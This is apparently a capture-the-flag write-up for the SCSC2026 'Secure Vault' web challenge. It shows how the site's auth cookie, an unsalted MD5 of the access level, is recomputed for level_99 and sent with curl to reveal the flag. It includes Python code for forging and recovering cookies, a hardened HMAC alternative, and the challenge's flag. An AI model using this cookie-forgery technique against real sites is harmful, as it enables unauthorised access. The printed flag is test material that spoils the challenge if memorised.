SCSC2026 Quals - SCSC Secure Vault - Web Exploitation Writeup

Category: Web Exploitation
URL: http://sriwijayasecuritysociety.com:8003/
Flag: SCSC26{kUE_r4h4s14_bU4t_4ks3s_L3v3L_d3w4}

Challenge Description

A document storage system using hash-based authentication. Users are given a scsc_auth cookie that determines their access level. Default access is “level_1”, but the secret document requires “level_99”.

Initial Reconnaissance

$ curl -v http://sriwijayasecuritysociety.com:8003/ 2>&1 | grep -i cookie
< Set-Cookie: scsc_auth=c98a679441798bdb9c194f9ca471e6cd

The cookie is 32 hex characters, the length of an MD5 digest (other 128-bit digests look the same, so the guess is checked in the next step). It was set without any login, so the server hands every visitor the level_1 token by default.

Analysis

Let's verify whether the cookie is the MD5 of the access level string. `echo -n` matters here: without it the trailing newline is hashed too and the digest will not match.

$ echo -n "level_1" | md5sum
c98a679441798bdb9c194f9ca471e6cd  -

Confirmed. The cookie is simply MD5("level_1") with no salt and no server secret involved.

Vulnerability

The authentication mechanism has critical flaws:

  1. No server-side session state: the cookie alone decides the access level, so the server trusts a value the client fully controls.
  2. No secret key or salt mixed into the hash, so the token is a pure function of a public, predictable string.
  3. No integrity protection (e.g. an HMAC over the level), so the server cannot distinguish a cookie it issued from one the client computed itself.
  4. The level names are short, predictable labels (level_1, level_99), so their MD5 can be recomputed, or looked up in any hash table, by anyone.

Exploitation

Generate the MD5 hash for level_99:

$ echo -n "level_99" | md5sum
9a22a3d174f06065a7dc2769f16fc738  -

Access the vault with the forged cookie (the request goes straight to index.php, the page that lists the documents):

$ curl -s -b "scsc_auth=9a22a3d174f06065a7dc2769f16fc738" \
    http://sriwijayasecuritysociety.com:8003/index.php
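
The whole attack, from recovering the level behind an observed cookie to building the forged request, fits in a few lines, and the fix is just as short. The following Python is an added example and not part of the writeup or the challenge source (which is not published); the `vulnerable_server_level` function is a hypothetical reconstruction of what the vault must be doing, and `issue_token`/`verify_token` show the HMAC-signed alternative that defeats the forgery. The hash calls hash exactly the bytes that `echo -n` feeds to `md5sum` above.

```python
import hashlib
import hmac
import secrets
from typing import Optional

# Cookie name and target URL as given in the writeup.
COOKIE_NAME = "scsc_auth"
TARGET_URL = "http://sriwijayasecuritysociety.com:8003/index.php"


def forge_cookie(level: str) -> str:
    """Client-side token construction: plain, unsalted MD5 of the level string,
    the same bytes as `echo -n "<level>" | md5sum` (no trailing newline)."""
    return hashlib.md5(level.encode()).hexdigest()


def recover_level(cookie: str, max_level: int = 1000) -> Optional[str]:
    """Reverse an observed cookie by hashing candidate level strings.
    The search space is tiny because the hashed input is a predictable label,
    not a secret; this is the flaw the writeup's md5sum check exploits."""
    for n in range(max_level):
        candidate = f"level_{n}"
        if hmac.compare_digest(forge_cookie(candidate), cookie):
            return candidate
    return None


def curl_command(level: str) -> str:
    """Build the curl invocation from the exploitation step for any level."""
    return f'curl -s -b "{COOKIE_NAME}={forge_cookie(level)}" {TARGET_URL}'


# --- Assumed server logic (hypothetical; the challenge source is not published) ---

def vulnerable_server_level(cookie: str) -> Optional[str]:
    """Reconstruction of the vault's check: grant whichever level the cookie
    hashes to. Anyone who can compute MD5 gets any level they like."""
    for candidate in ("level_1", "level_99"):
        if hmac.compare_digest(hashlib.md5(candidate.encode()).hexdigest(), cookie):
            return candidate
    return None


# Per-deployment secret that never leaves the server (assumed hardened design).
SERVER_KEY = secrets.token_bytes(32)


def issue_token(level: str, key: bytes = SERVER_KEY) -> str:
    """Hardened issuance: the level stays readable, but an HMAC-SHA256 tag
    computed with the server key is appended, so the client cannot mint one."""
    tag = hmac.new(key, level.encode(), hashlib.sha256).hexdigest()
    return f"{level}.{tag}"


def verify_token(token: str, key: bytes = SERVER_KEY) -> Optional[str]:
    """Hardened check: recompute the tag for the claimed level and compare in
    constant time. A forged or edited token yields None, not a level."""
    level, sep, tag = token.rpartition(".")
    if not sep or not level:
        return None
    expected = hmac.new(key, level.encode(), hashlib.sha256).hexdigest()
    return level if hmac.compare_digest(expected, tag) else None


if __name__ == "__main__":
    observed = forge_cookie("level_1")  # stand-in for the Set-Cookie value seen in recon
    print("observed cookie decodes to:", recover_level(observed))
    print(curl_command("level_99"))
    print("vulnerable server grants:", vulnerable_server_level(forge_cookie("level_99")))
    forged = "level_99." + forge_cookie("level_99")
    print("hardened server on forged token:", verify_token(forged))
    print("hardened server on issued token:", verify_token(issue_token("level_1")))
```

Running the script offline prints the level recovered from the default cookie, the forged curl command, and shows that the hypothetical vulnerable check grants level_99 to the computed hash while the HMAC-based check rejects anything not issued with the server key. Editing the level inside an issued token also fails verification, which is the property the original scheme lacks.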

Response

<div class="file-item">
    <span>Top_Secret_Flag.txt</span>
    <span class="unlocked">SCSC26{kUE_r4h4s14_bU4t_4ks3s_L3v3L_d3w4}</span>
</div>
Source: https://blog.rei.my.id/posts/20/scsc2026-quals-scsc-secure-vault-web-exploitation-writeup/
Author: Reidho Satria
Published: 2026-02-17
License: CC BY-NC-SA 4.0